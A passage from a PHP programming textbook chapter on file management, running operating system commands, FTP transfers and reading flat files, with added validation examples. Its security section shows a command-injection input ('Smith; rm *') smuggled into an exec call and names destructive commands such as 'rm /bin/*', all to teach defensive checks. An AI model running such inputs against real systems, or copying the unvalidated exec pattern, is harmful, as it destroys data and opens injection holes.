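        return null;               // never build a path from an unexpected value
    }
    // realpath() resolves symbolic links and returns false for a missing file.
    $base = realpath($includeDir);
    $path = realpath($includeDir . "/" . $day . ".inc");
    if ($base === false || $path === false) {
        return null;
    }
    // The resolved file must still be located inside the include directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Includes the message file for $day; returns false when nothing was included.
function show_day_message(string $includeDir, string $day): bool
{
    $path = day_message_path($includeDir, $day);
    if ($path === null) {
        return false;
    }
    require $path;
    return true;
}

// Constructed demo: a temporary directory stands in for an include directory
// outside the web space, such as d:/hidden in the text.
$includeDir = sys_get_temp_dir() . "/include_demo_" . getmypid();
mkdir($includeDir);
file_put_contents(
    "$includeDir/Sun.inc",
    "<p>Go ahead. Sleep in. No work today.</p>\n"
);

// Constructed inputs: one valid day, two values not on the list, and one
// valid day whose file is missing.
foreach (array("Sun", "sun", "Sun.inc", "Mon") as $requested) {
    if (!show_day_message($includeDir, $requested)) {
        echo "[$requested] no message shown\n";
    }
}

unlink("$includeDir/Sun.inc");
rmdir($includeDir);
```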

In This Chapter

Manipulating files
Using operating system commands on files
Transferring files from one machine to another
Reading and writing files
Swapping data with other programs
Using SQLite to store data in text files


This book describes using tools like HTML, PHP, MySQL, and CSS together
to develop dynamic web applications. The HTML and CSS provide the
presentation and markup of pages, while PHP displays web pages and interacts
with MySQL to retrieve and store data for the application. For most
web applications, PHP needs to interact only with MySQL. However, a few
situations require a web application that’s more complex. The web application
might need to interact with the operating system or with other software
on your system.

A photo gallery is one web application that might need to interact with your 
operating system. Your photo gallery might allow users to upload graphic 
files into your application. For such an application, you might need to manage 
the files that the users upload. You might need to rename them, move them, 
or delete them. You might need to know when the photos were uploaded 
or when they were last accessed. PHP provides all the features you need to 
manage your file system, and we help you understand how to do that. 

PHP also allows you to run any program that’s on your computer, regardless 
of whether it’s a PHP program. With PHP code, you can transfer files between 
computers by using File Transfer Protocol (FTP). You can store information 
in files other than databases. This chapter gives you the information you need 
to use PHP to do pretty much anything you can think of on your computer. 
This chapter also provides information on the security risks inherent in 
executing operating system commands. The chapter wraps up with a look at 
a quick way to store data through a utility called SQLite. 

Managing Files

The information you save on your hard drive is organized into files. Rather 
than storing files in one big file drawer, making them difficult to find, files are 
stored in many drawers, called directories or folders. The system of files and 
directories is called a file system. 

A file system is organized in a hierarchical structure, with a top level that is a
single directory called root, such as c:\ on Windows or / on Linux or Mac. The
root directory contains other directories, and each directory can contain other
directories, and so on. The file system’s structure can go down many levels.

A directory is a type of file that you use to organize other files. It contains a 
list of files and the information needed for the operating system to find those 
files. A directory can contain both files and other directories. 


Files can be checked (to see if they exist, for example), copied, deleted, and 
renamed, among other things. Functions for performing these file-management 
tasks are described in the following sections. You also find out about functions 
that allow you to manage directories and discover what’s inside them. 



In this chapter, we cover the most useful functions for managing files, but 
more functions are available. When you need to perform an action on a file 
or directory, first check the online PHP documentation at www.php.net/manual
to see whether an existing function does what you need to do.
Using a function is preferable, if an appropriate function exists. If such a 
function does not exist, you can use your operating system commands or a 
program in another language, as described in the “Using Operating System 
Commands” section, later in this chapter. 


Getting information about files

Often you want to know information about a file. PHP has functions that 
allow you to find out file information from within a script. 

You can find out whether a file exists with the file_exists statement, as
follows: 

$result = file_exists("stuff.txt"); 

After this statement, $result contains either true or false. The function 
is often used in a conditional statement, such as the following: 

if(!file_exists("stuff.txt")) 

{ 

echo "File not found!\n"; 

} 

When you know the file exists, you can find out information about it. 




Table 3-1 shows many of the functions that PHP provides for checking files. 
(Some of the information in Table 3-1 is relevant only for Linux, Unix, and 
Mac, and some is returned on Windows as well.) 


Table 3-1   Functions That Get Information about a File

Function                    What It Does                      Output
--------------------------  --------------------------------  -------------------------
is_file("stuff.txt")        Tests whether the file is a       true or false
                            regular file, rather than a
                            directory or other special
                            type of file
is_dir("stuff.txt")         Tests whether the file is a       true or false
                            directory
is_executable("do.txt")     Tests whether the file is         true or false
                            executable
is_writable("stuff.txt")    Tests whether you can write to    true or false
                            the file
is_readable("stuff.txt")    Tests whether you can read the    true or false
                            file
fileatime("stuff.txt")      Returns the time when the file    Unix timestamp (like
                            was last accessed                 1057196122) or false
filectime("stuff.txt")      Returns the time when the file    Unix timestamp or false
                            was created
filemtime("stuff.txt")      Returns the time when the file    Unix timestamp or false
                            was last modified
filegroup("stuff.txt")      Returns the group ID of the file  Integer that is a group
                                                              ID or false
fileowner("stuff.txt")      Returns the user ID of the owner  Integer that is a user
                            of the file                       ID or false
filesize("stuff.txt")       Returns the file size in bytes    Integer or false
filetype("stuff.txt")       Returns the file type             File type (such as file,
                                                              dir, link, char), or
                                                              false if error or can't
                                                              identify type
basename("/t1/do.txt")      Returns the filename from the     do.txt
                            path
dirname("/t1/do.txt")       Returns the directory name from   /t1
                            the path

A function that returns useful information about a path/filename is
pathinfo(). You can use the following statement:

$pinfo = pathinfo("/topdir/nextdir/stuff.txt");

After the statement, $pinfo is an array that contains the following three
elements:


$pinfo[dirname] = /topdir/nextdir 
$pinfo[basename] = stuff.txt 
$pinfo[extension] = txt 



When you’re testing a file with one of the is_something functions from
Table 3-1, any typing error, such as a misspelling of the filename, gives a
false result. For example, is_dir("tyme") returns false if "tyme" is
a file, not a directory. But, it also returns false if "tyme" does not exist
because you meant to type "type".

Unix timestamps are returned by some of the functions given in Table 3-1.
You can convert these timestamps to dates with the date function, as
described in Chapter 1 in this minibook.


Copying, renaming, and deleting files

You can copy an existing file into a new file. After copying, you have two 
copies of the file with two different names. Copying a file is often useful for 
backing up important files. To copy a file, use the copy statement, as follows: 


copy("fileold.txt","filenew.txt"); 


This statement copies fileold.txt, an existing file, into filenew.txt. If a 
file with the name filenew.txt already exists, it’s overwritten. If you don’t 
want to overwrite an existing file, you can prevent it by using the following 
statements: 


if(!file_exists("filenew.txt"))
{
   copy("fileold.txt","filenew.txt");
}
else
{
   echo "File already exists!\n";
}


You can copy a file into a different directory by using a pathname as the
destination, as follows:


copy("fileold.txt","newdir/filenew.txt"); 

You can rename a file by using the rename statement, as follows:

rename("oldname.txt","newname.txt");

If you attempt to rename a file with the name of a file that already exists, a 
warning is displayed, as follows, and the file is not renamed: 

Warning: rename(fileold.txt,filenew.txt): File exists in 

c:test.php on line 17 

To remove an unwanted file, use the unlink statement, as follows:

unlink("badfile.txt");

After this statement, the file is deleted. 

If the file doesn’t exist to start with, unlink doesn’t complain. It acts the 
same as if it had deleted the file. PHP doesn’t let you know if the file doesn’t 
exist. So, watch out for typos. 

Organizing files

Files are organized into directories, also called folders. This section 
describes how to create and remove directories and how to get a list of the 
files in a directory. 

Creating a directory 

To create a directory, use the mkdir function, as follows:

mkdir("testdir");

This statement creates a new directory named testdir in the same directory
where the script is located. That is, if the script is /test/test.php, the
new directory is /test/testdir. If a directory already exists with the same
name, a warning is displayed, as follows, and the new directory is not created:

Warning: mkdir(): File exists in d:/test/test.php on line 5

You can check first to see whether the directory already exists by using the 
following statements: 

if(!is_dir("mynewdir"))
{
   mkdir("mynewdir");
}
else
{
   echo "Directory already exists!";
}

After the directory is created, you can organize its contents by copying
files into and out of the directory. Copying files is described in the section 
“Copying, renaming, and deleting files,” earlier in this chapter. 

To create a directory in another directory, use the entire pathname, as follows: 

mkdir("/topdir/nextdir/mynewdir"); 

You can use a relative path to create a new directory, as follows: 

mkdir("../mynewdir");

With this statement, if your script is /topdir/test/makedir.php, the
new directory is /topdir/mynewdir.

To change to a different directory, use the following statement: 

chdir("../anotherdir");


Building a list of all the files in a directory

Getting a list of the files in a directory is often useful. For example, you 
might want to provide a list of files for users to download or want to display 
images from files in a specific directory. 

PHP provides functions for opening and reading directories. To open a 
directory, use the opendir statement, as follows: 

$dh = opendir("/topdir/testdir");

If you attempt to open a directory that doesn’t exist, a warning is displayed, 
as follows: 

Warning: opendir(testdir): failed to open dir: Invalid
argument in test13.php on line 5

In the previous statement, the variable $dh is a directory handle, a pointer to 
the open directory that you can use later to read from the directory. To read 
a filename from the directory, use the readdir function, as follows: 

$filename = readdir($dh); 

After this statement, $filename contains the name of a file. Only the filename
is stored in $filename, not the entire path to the file. To read all the
filenames in a directory, you can use a while loop, as follows:

while($filename = readdir($dh)) 

{ 

echo $filename."\n"; 

} 

The readdir function doesn’t provide any control over the order in which
filenames are read, so you don’t always get the filenames in the order you 
expect. 

Suppose you want to create an image gallery that displays all the images in 
a specified directory in a web page. You can use the opendir and readdir 
functions to do this. Listing 3-1 shows a script that creates an image gallery. 


Listing 3-1: A Script That Creates an Image Gallery

<?php
/* Script name:  displayGallery
 * Description:  Displays all the image files that are
 *               stored in a specified directory.
 */
echo "<html><head><title>Image Gallery</title></head>
      <body>";
$gallery = array();
$dir = "../test1/testdir/";                                     // →8
$dh = opendir($dir);                                            // →9
while($filename = readdir($dh))                                 // →10
{
   $filepath = $dir.$filename;                                  // →12
   if(is_file($filepath) and preg_match('/\.jpg$/',$filename))  // →13
   {
      $gallery[] = $filepath;
   }
}
sort($gallery);                                                 // →16
foreach($gallery as $image)                                     // →17
{
   echo "<hr />";
   echo "<img src='$image' /><br />";
}
?>
</body></html>

Notice the line numbers at the end of some of the lines in Listing 3-1. The 
following discussion of the script and how it works refers to the line numbers 
in the script listing: 

—>8   This line stores the name of the directory in $dir for use later in 
      the program. Notice that the / is included at the end of the 
      directory name. Don’t use \, even with Windows. 

—>9   This line opens the directory. 

—>10  This line starts a while loop that reads in each filename in the 
      directory. 

—>12  This line creates the variable $filepath, which is the complete 
      path to the file. 

      If the / isn’t included at the end of the directory name on Line 8, 
      $filepath will not be a valid path. 

—>13  This line checks to see whether the file is a graphics file by 
      looking for the .jpg extension. If the file has a .jpg extension, the 
      complete file path is added to an array called $gallery. 

—>16  This line sorts the array so the images are displayed in alphabetical 
      order. 

—>17  This line starts the foreach loop that displays the images in the 
      web page. 


Using Operating System Commands 

When you need to interact with your operating system, it’s always best to 
use the PHP functions that are provided for this purpose. Using PHP functions 
is faster and usually more secure than executing an operating system 
command directly. However, occasionally PHP doesn’t provide a function 
to perform the task you need. In such cases, you can use PHP features that 
enable you to execute an operating system command. 

In this section, we assume that you know the format and use of the system 
commands for your operating system. Describing operating system commands 
is outside the scope of this book. If you need to run an operating 
system command from your PHP script, this section shows you how. 

PHP allows you to use system commands or run programs in other languages 
by using any of the following methods: 

♦ backticks: PHP executes the system command that is between two 
backticks (`) and displays the result. 

♦ system function: This function executes a system command, displays 
the output, and returns the last line of the output. 

♦ exec function: This function executes a system command, stores the 
output in an array, and returns the last line of the output. 

♦ passthru function: This function executes a system command and 
displays the output. 

You can execute any command that you can type into the system prompt. 
The command is executed exactly as is. You can execute simple commands: 
ls or dir, rename or mv, rm or del, though it’s more efficient to use the 
built-in PHP functions for those, as already discussed. 

If your operating system allows you to pipe or redirect output, you can pipe 
or redirect in the system command you’re executing in PHP. If your operating 
system allows you to enter two commands on one line, you can put two 
commands into the single command you’re executing from PHP. The following 
sample commands are valid to execute from PHP, depending on the operating 
system: 

dir 
rm badfile.txt 
dir | sort 
cd c:\php ; dir       (Not valid in Windows) 
"cd c:\php && dir"    (Windows) 
dir > dirfile 
sort < unsortedfile.txt 

On some occasions, you want to run a system command that takes a long 
time to finish. You can run the system command in the background (if your 
operating system supports such things) while PHP continues with the script. 
If you do this, you need to redirect the output to a file, rather than return it 
to the script, so that PHP can continue before the system command finishes. 

The following sections describe the preceding methods in greater detail. 


Using backticks 

A simple way to execute a system command is to put the command between 
two backticks (`), as follows: 

$result = `dir c:\php`; 

The variable $result contains the statement’s output — in this case, a 
list of the files in the c:\php directory. If you echo $result, the following 
output is displayed: 

 Volume in drive C has no label. 
 Volume Serial Number is 58B2-DBD6 

 Directory of c:\php 

10/10/2013  05:43 PM    <DIR> 
10/10/2013  05:43 PM    <DIR> 
10/10/2013  04:53 PM    <DIR>          dev 
10/10/2013  04:53 PM    <DIR>          ext 
10/10/2013  04:53 PM    <DIR>          extras 


The backtick operator is disabled when safe_mode is enabled. On some 
systems, safe_mode is set to Off by default when PHP is installed. On 
other systems, safe_mode is set to On. The system administrator can 
change this value. 


Using the system function 

The system function executes a system command, displays the output, and 
returns the last line of the output from the system command. To execute a 
system command, use the following statement: 


$result = system("dir c:\php"); 

When this statement executes, the directory listing is displayed, and 
$result contains the last line that was output from the command. If you 
echo $result, you see something like the following: 

11 Dir(s) 566,263,808 bytes free 

The contents of $result with the system function is the last line of the 
output from the dir command. 


Using the exec function 

The exec function executes a system command but doesn’t display the 
output. Instead, the output can be stored in an array, with each line of the 
output becoming an element in the array. The last line of the output is 
returned. 

Perhaps you just want to know how many files and free bytes are in a 
directory. With the following statement, you execute a command without saving 
the output in an array: 

$result = exec("dir c:\php"); 

The command executes, but the output isn’t displayed. The variable 
$result contains the last line of the output. If you echo $result, the 
display looks something like this: 

11 Dir(s) 566,263,808 bytes free 

The output is the last line of the output of the dir command. If you want to 
store the entire output from the dir command in an array, use the following 
command: 


$result = exec("dir c:\php",$dirout); 


After this statement, the array $dirout contains the directory listing, with 
one line per item. You can display the directory listing as follows: 

foreach($dirout as $line) 
{ 
    echo "$line\n"; 
} 

The loop displays the following: 

 Volume in drive C has no label. 
 Volume Serial Number is 394E-15E5 

 Directory of c:\php 

10/10/2013  05:43 PM    <DIR> 
10/10/2013  05:43 PM    <DIR> 
10/10/2013  04:53 PM    <DIR>          dev 
10/10/2013  04:53 PM    <DIR>          ext 
10/10/2013  04:53 PM    <DIR>          extras 
08/30/2013  07:11 AM           417,792 fdftk.dll 


You can also use the following statements to get specific elements from the 
output array: 

echo $dirout[3]; 
echo $dirout[7]; 

The output is as follows: 

Directory of C:\PHP 

10/10/2013 04:53 PM <DIR> dev 

Using the passthru function 

The passthru function executes a system command and displays the 
output exactly as it is returned. To execute a system command, use the 
following statement: 

passthru("dir c:\php"); 

The statement displays the directory listing but doesn’t return anything. 
Therefore, you don’t use a variable to store the returned data. 

The output is displayed in raw form; it isn’t processed. Therefore, this 
function can be used when binary output is expected. 

Accessing error messages from system commands 

The methods for executing system commands do not display or return an 
informational error message when the system command fails. You know 
the system command didn’t work because you didn’t get the outcome you 
expected. But because the functions don’t return error messages, you don’t 
know what went wrong. 

You can return or display the operating system error message by adding 
a few extra characters to the system command you’re executing. On most 
operating systems, if you add the characters 2>&1 after the system command, 
the error message is sent to wherever the output is directed. For 
example, you can use the following statement: 

$result = system("di c:\php"); 

The system function displays the directory when the system command 
executes. However, notice that dir is mistyped. It is di rather than dir. No 
system command called di exists, so the system command can’t execute, 
and nothing is displayed. Suppose you used the following statement instead: 

$result = system("di c:\php 2>&1"); 

In this case, the error message is displayed. On Windows, the error message 
displayed is as follows: 

'di' is not recognized as an internal or external command, 
operable program or batch file. 

Be sure you don’t include any spaces in 2>&1. The format requires the 
characters together, without any spaces. 


Understanding security issues 

When you execute a system command, you allow a user to perform an action 
on your computer. If the system command is dir c:\php, that’s okay. 
However, if the system command is rm /bin/* or del c:\*.*, you won’t 
be happy with the results. You need to be careful when using the functions 
that execute system commands outside your script. 

As long as you execute only commands that you write yourself, such as dir 
or ls, you’re okay. But when you start executing commands that include 
data sent by users, you need to be extremely careful. For example, suppose 
you have an application in which users type a name into a form and your 
application then creates a directory with the name sent by the user. The 
user types Smith into the form field named directoryName. Your script 
that processes the form has a command, as follows: 


$directoryName = $_POST['directoryName']; 
exec("mkdir $directoryName"); 

Because $directoryName = Smith, mkdir Smith is the system command 
that is executed. The directory is created, and everybody is happy. 

However, suppose the user types Smith; rm * into the form. In this case, 
$directoryName = Smith; rm *. The system command that executes is now 
mkdir Smith; rm *. On many operating systems, such as Unix and Linux, 
the semicolon character separates two commands so that two commands 
can be entered on one line. Oops! The commands are executed as follows: 

mkdir Smith 
rm * 

Now you have a problem. The directory Smith is created, and all the files in 
the current directory are removed. 

If you use a variable in a system command, you must use it carefully. You 
must know where it came from. If it comes from outside the script, you need 
to check the value in the variable before using it. In the preceding example, 
you could add code so the script checks the variable to be sure it contains 
only letters and numbers before using it in the mkdir command. (Chapter 2 
in this minibook describes how to use an if statement to perform such 
checks.) 
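
The check described above can be written as follows. This is an added example, not code from the book: the function names, the 64-character limit, and the temporary base directory are assumptions, and the sample inputs are constructed. It goes one step further than the text by creating the directory with PHP's built-in mkdir function, so no shell sees the user's text at all, and it shows escapeshellarg for the case where a shell command can't be avoided.

```php
<?php
// Added example (not from the book). Function names, the 64-character
// limit and the temporary base directory are assumptions.

/**
 * True only if $name is 1-64 ASCII letters and digits.
 * \A and \z match the real start and end of the string; a plain $ would
 * also accept a name that is followed by a newline.
 */
function isSafeDirectoryName($name)
{
    return is_string($name)
        && preg_match('/\A[A-Za-z0-9]{1,64}\z/', $name) === 1;
}

/**
 * Preferred: create the directory with PHP's own mkdir(), so no shell
 * ever parses the user's text. Returns the new path, or false.
 */
function createUserDirectory($baseDir, $name)
{
    if (!isSafeDirectoryName($name)) {
        return false;
    }
    $path = rtrim($baseDir, '/\\') . DIRECTORY_SEPARATOR . $name;
    if (file_exists($path)) {
        return false;
    }
    return mkdir($path, 0750) ? $path : false;
}

/**
 * Only when a shell command is unavoidable: validate first, then quote
 * the value with escapeshellarg() so it reaches mkdir as one argument.
 */
function buildMkdirCommand($name)
{
    if (!isSafeDirectoryName($name)) {
        return false;
    }
    return 'mkdir ' . escapeshellarg($name);
}

// Constructed sample values for the directoryName form field.
$samples = array(
    "Smith",          // the well-behaved input from the text
    "Smith; rm *",    // the two-command input from the text
    "Smith && dir",   // the Windows-style separator shown earlier
    "Smith\n",        // trailing newline that a bare $ anchor would accept
    "",               // empty field
);

$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . uniqid('dirdemo_');
mkdir($baseDir, 0750);

foreach ($samples as $input) {
    $path    = createUserDirectory($baseDir, $input);
    $command = buildMkdirCommand($input);
    printf("%-16s => %s | %s\n",
        json_encode($input),
        $path === false ? "rejected" : "created " . basename($path),
        $command === false ? "no command built" : $command);
}

// Remove the demo directories again.
foreach (glob($baseDir . DIRECTORY_SEPARATOR . '*') as $dir) {
    rmdir($dir);
}
rmdir($baseDir);
```

In a form handler, the value of $_POST['directoryName'] takes the place of the sample array; only the first sample is accepted, and the other four are rejected before any directory or command is created.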


Using FTP 

Transferring files from one computer to another happens a gazillion times a 
day on the Internet. When colleagues on opposite sides of the country need 
to share files, it isn’t a problem. A quick transfer takes only seconds, and all 
parties have the files they need. 

File Transfer Protocol (FTP) is a common way to transfer files from one 
computer to another. FTP allows you to get a directory listing from another 
computer or to download or upload a single file or several files at once. 

FTP is client/server software. To use FTP to transfer files between your 
computer and a remote computer, you connect to an FTP server on the 
remote computer and send it requests. 

It’s worth noting that FTP is inherently insecure, and not in a way that therapy 
will help. When you use FTP, your username, password, and the files themselves 
are passed over the network without encryption. This means that 
someone with enough knowledge and access to your network could “sniff” 
the username and password. If you’re looking for a more secure method for 
transferring files, look to the SCP or SFTP commands. That said, FTP is still 
in wide use, especially for hosting providers. 

To use FTP in your scripts, FTP support needs to be enabled when PHP is 
installed. If you installed PHP for Windows, you don’t need to do anything 
extra to enable FTP support. If you’re compiling PHP on Unix, Linux, or Mac 
and you want to enable FTP support, you can use the FTP support installation 
option, as follows: 

--enable-ftp 

In this section, we tell you what you need to know about logging in to your 
FTP server, accessing a directory listing, transferring files to and from the 
FTP server, and using various functions to accomplish FTP-related tasks. 

Logging in to the FTP server 

To connect to the FTP server on the computer you want to exchange files 
with, use the ftp_connect function, as follows: 

$connect = ftp_connect("janet.valade.com"); 

Or, you can connect by using an IP address, as follows: 

$connect = ftp_connect("172.17.204.2"); 

After you connect, you must log in to the FTP server. You need a user ID and 
a password to log in. You might have your own personal ID and password, 
or you might be using a general ID and password that anyone can use. Some 
public sites on the Internet let anyone log in by using the user ID of anonymous 
and the user’s e-mail address as the password. It’s best for security to put 
the user ID and password into a separate file and to include the file when 
needed. 

The ftp_login function enables you to log in to an FTP server after you’ve 
made the connection. This statement assumes you have your account ID and 
password stored in variables, as follows: 

$login_result = ftp_login($connect,$userid,$passwd); 

If you try to log in without establishing a connection to the FTP server first, 
you see the following warning: 

Warning: ftp_login() expects parameter 1 to be resource, 
boolean given in d:\testl\testl3.php on line 9 

The warning doesn’t stop the program. The login fails, but the script 
continues, which probably isn’t what you want. Because the rest of your script 
probably depends on your successful FTP connection, you might want to 
stop the script if the functions fail. The following statements stop the script 
if the function fails: 

$connect = ftp_connect("janet.valade.com") 
    or die("Can't connect to server"); 
$login_result = ftp_login($connect,$userid,$passwd) 
    or die("Can't login to server"); 

After you log in to the FTP server, you can send it requests to accomplish 
tasks, such as getting a directory listing or uploading and downloading files, 
as described in the following sections. 

Getting a directory listing 

One common task is to get a directory listing. The ftp_nlist statement 
gets a directory listing from the remote computer and stores it in an array, 
as follows: 

$filesArr = ftp_nlist($connect,"data"); 

The second parameter in the parentheses is the name of the directory. If 
you don’t know the name of the directory, you can request the FTP server to 
send you the name of the current directory, as follows: 

$directory_name = ftp_pwd($connect); 
$filesArr = ftp_nlist($connect,$directory_name); 

The directory listing that FTP sends after the ftp_nlist statement runs is 
stored in an array, one filename in each element of the array. You can then 
display the directory listing from the array, as follows: 

foreach($filesArr as $value) 
{ 
    echo "$value\n"; 
} 


Downloading and uploading files with FTP 

You can download a file from the remote computer with the ftp_get function. 
The following statement downloads a file from the remote computer 
after you’re logged in to the FTP server: 

ftp_get($connect,"newfile.txt","data.txt",FTP_ASCII); 

The first filename, newfile.txt, is the name the file will have on your 
computer after it’s downloaded. The second filename, data.txt, is the existing 
name of the file that you want to download. 

The FTP_ASCII term in the statement tells FTP what kind of file is being 
downloaded. Here are the choices for file mode: 

♦ FTP_ASCII: These are text files. 

♦ FTP_BINARY: Machine language files, basically anything that isn’t plain 
text. 

You can determine which file mode you need by examining the contents of 
the file. If the contents are characters that you can read and understand, the 
file is ASCII. If the contents appear to be garbage, the file is binary. Graphic 
files, for example, are binary. 

You can upload a file with a similar function called ftp_put. The following 
statement uploads a file: 

ftp_put($connect,"newfile.txt","data.txt",FTP_ASCII); 

The first filename, newfile.txt, is the name the file will have on the 
remote computer after it’s uploaded. The second filename, data.txt, is the 
existing name of the file that you want to upload. 

When you’re finished transferring files over your FTP connection, you can 
close the connection with the following statement: 

ftp_close($connect); 

The script in Listing 3-2 downloads all the files in a directory that have a 
.txt extension. The files are downloaded from the remote computer over 
an FTP connection. 


Listing 3-2: A Script to Download Files via FTP 

<?php 
/*  Script name:  downloadFiles 
 *  Description:  Downloads all the files with a .txt 
 *                extension in a directory via FTP. 
 */ 
include("ftpstuff.inc"); 
$dir_name = "data/"; 
$connect = ftp_connect($servername) 
    or die("Can't connect to FTP server"); 
$login_result = ftp_login($connect,$userID,$passwd) 
    or die("Can't log in"); 
$filesArr = ftp_nlist($connect,$dir_name); 
foreach($filesArr as $value) 
{ 
    if(preg_match("#\.txt$#",$value)) 
    { 
        if(!file_exists($value)) 
        { 
            ftp_get($connect,$value,$dir_name.$value,FTP_ASCII); 
        } 
        else 
        { 
            echo "File $value already exists!\n"; 
        } 
    } 
} 
ftp_close($connect); 

The script gets a directory listing from the remote computer and stores it in 
$filesArr. The foreach statement loops through the filenames in $filesArr 
and checks to see whether each file has a .txt extension. When a file 
has a .txt extension, the script tests to see whether a file with the same 
name already exists on the local computer. If a file with that name doesn’t 
already exist, the file is downloaded; if such a file does exist, a message is 
printed, and the file isn’t downloaded. 
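
Listing 3-2 uses each name returned by ftp_nlist as the local filename, so the remote server chooses where the download is written on your computer. The following added example (not the book's code; the function names, the 100-character limit, the local directory, and the constructed sample listing are assumptions) reduces each entry to a plain filename and checks it against an allow-list before it is used as a path. It runs without an FTP connection.

```php
<?php
// Added example, not the book's code. Function names, the 100-character
// limit, the local directory and the sample listing are assumptions.

/**
 * Maps one entry from a remote listing to a safe local filename,
 * or returns false if the entry should be skipped.
 */
function localNameForRemoteEntry($entry)
{
    if (!is_string($entry)) {
        return false;
    }
    // Servers may return "data/report.txt" or just "report.txt"; keep only
    // the last path component, whichever separator the server used.
    $name = basename(str_replace('\\', '/', $entry));

    // Allow-list: letters, digits, dot, underscore and hyphen, not starting
    // with a dot, ending in .txt. \A and \z anchor the whole string.
    if (preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9._-]{0,99}\.txt\z/', $name) !== 1) {
        return false;
    }
    return $name;
}

/**
 * Builds the list of downloads as array(remote path, local path) pairs.
 * Every local path lies directly inside $localDir. Files that already
 * exist locally are skipped, as in Listing 3-2.
 */
function planDownloads(array $listing, $remoteDir, $localDir)
{
    $plan = array();
    foreach ($listing as $entry) {
        $name = localNameForRemoteEntry($entry);
        if ($name === false) {
            continue;
        }
        $local = rtrim($localDir, '/\\') . DIRECTORY_SEPARATOR . $name;
        if (file_exists($local)) {
            continue;
        }
        $plan[] = array(rtrim($remoteDir, '/') . '/' . $name, $local);
    }
    return $plan;
}

// Constructed listing, standing in for the array ftp_nlist() returns.
$listing = array(
    "data/report.txt",       // server that prefixes the directory name
    "notes.txt",             // server that returns bare names
    "data/photo.jpg",        // wrong extension
    "../../startup.txt",     // directory parts are dropped by basename()
    "data/my notes.txt",     // space is not on the allow-list
    "data/..",               // not a file name at all
);

$localDir = sys_get_temp_dir();
foreach (planDownloads($listing, "data/", $localDir) as $pair) {
    list($remote, $local) = $pair;
    echo "$remote -> $local\n";
    // With a live connection, the download itself would be:
    // ftp_get($connect, $local, $remote, FTP_ASCII);
}
```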

The script in Listing 3-2 includes a file named ftpstuff.inc. This file 
contains the information needed to connect to the server with FTP. The 
ftpstuff.inc file contains code similar to the following: 

<?php 
$servername = "yourserver"; 
$userID = "youruserid"; 
$passwd = "yourpassword"; 
?> 

Looking at other FTP functions 

Additional FTP functions perform other actions, such as change to another 
directory on the remote computer or create a new directory on the remote 
computer. Table 3-2 contains most of the FTP functions that are available. 


Table 3-2: FTP Functions 

Function                                        What It Does 
ftp_cdup($connect)                              Changes to the directory directly above the current directory. 
ftp_chdir($connect,"directoryname")             Changes directories on the remote computer. 
ftp_close($connect)                             Closes an FTP connection. 
ftp_connect("servername")                       Opens a connection to the computer. servername can be a domain name or an IP address. 
ftp_delete($connect,"path/filename")            Deletes a file on the remote computer. 
ftp_exec($connect,"command")                    Executes a system command on the remote computer. 
ftp_fget($connect,$fh,"data.txt",FTP_ASCII)     Downloads the file contents from the remote computer into an open file. $fh is the file handle of the open file. 
ftp_fput($connect,"new.txt",$fh,FTP_ASCII)      Uploads an open file to the remote computer. $fh is the file handle of the open file. 
ftp_get($connect,"d.txt","sr.txt",FTP_ASCII)    Downloads a file from the remote computer. sr.txt is the name of the file to be downloaded, and d.txt is the name of the downloaded file. 
ftp_login($connect,$userID,$password)           Logs in to the FTP server. 
ftp_mdtm($connect,"filename.txt")               Gets the time when the file was last modified. 
ftp_mkdir($connect,"directoryname")             Creates a new directory on the remote computer. 
ftp_nlist($connect,"directoryname")             Gets a list of the files in a remote directory. Files are returned in an array. 
ftp_put($connect,"d.txt","sr.txt",FTP_ASCII)    Uploads a file to the remote computer. sr.txt is the name of the file to be uploaded, and d.txt is the filename on the remote computer. 
ftp_pwd($connect)                               Gets the name of the current directory on the remote computer. 
ftp_rename($connect,"oldname","newname")        Renames a file on the remote computer. 
ftp_rmdir($connect,"directoryname")             Deletes a directory on the remote computer. 
ftp_size($connect,"filename.txt")               Returns the size of the file on the remote computer. 
ftp_systype($connect)                           Returns the system type of the remote file server (for example, Unix). 

Reading and Writing Files 

This book includes information about using PHP and MySQL together. In 
most applications, you store the data needed by the application in a MySQL 
database. However, occasionally you need to read or write information in a 
text file that isn’t a database. This section describes how to read and write 
data in a text file, also called a flat file. 

You use PHP statements to read from or write to a flat file. 

Using a flat file requires three steps: 

1. Open the file. 

2. Write data into the file or retrieve data from the file. 

3. Close the file. 

These steps are discussed in detail in the following sections. 

Accessing files 

The first step, before you can write information into or read information 
from a file, is to open the file. The following is the general format for the 
statement that opens a file: 

$fh = fopen("filename","mode") 

The variable, $fh, referred to as a file handle, is used in the statements that 
write data to or read data from the open file so that PHP knows which file to 
write into or read from. The $fh variable contains the information that 
identifies the location of the open file. 

You use a mode when you open the file to let PHP know what you intend to 
do with the file. Table 3-3 shows the modes you can use. 


Table 3-3: Modes for Opening a File 

Mode  What It Does                          What Happens When the File Doesn’t Exist 
r     Read only.                            A warning message is displayed. 
r+    Reading and writing.                  A warning message is displayed. 
w     Write only.                           PHP attempts to create it. (If the file exists, PHP overwrites it.) 
w+    Reading and writing.                  PHP attempts to create it. (If the file exists, PHP overwrites it.) 
a     Append data at the end of the file.   PHP attempts to create it. 
a+    Reading and appending.                PHP attempts to create it. 


The filename can be a simple filename (filename.txt), a path to the 
file (c:/data/filename.txt), or a URL (http://yoursite.com/filename.txt). 

Opening files in read mode 

You can open the file file1.txt to read the information in the file with the 
following statement: 

$fh = fopen("file1.txt","r"); 

Based on this statement, PHP looks for file1.txt in the current directory, 
which is the directory where your PHP script is located. If the file can’t be 
found, a warning message, similar to the following, might or might not be 
displayed, depending on the error level set, as described in Chapter 1 of this 
minibook: 

Warning: fopen(file1.txt): failed to open stream: No such 
file or directory in d:\test2.php on line 15 

Remember, a warning condition doesn’t stop the script. The script continues 
to run, but the file doesn’t open, so any later statements that read or write to 
the file aren’t executed. 

You probably want the script to stop if the file can’t be opened. You need to 
do this yourself with a die statement, as follows: 

$fh = fopen("file1.txt","r") 
    or die("Can't open file"); 

The die statement stops the script and displays the specified message. 


Opening files in write mode 

You can open a file in a specified directory to store information by using the 
following type of statement: 

$fh = fopen("c:/testdir/file1.txt","w"); 

If the file doesn’t exist, it is created in the indicated directory. However, if 
the directory doesn’t exist, the directory isn’t created, and a warning is 
displayed. (You must create the directory before you try to write a file into the 
directory.) 

You can check whether a directory exists before you try to write a file into it 
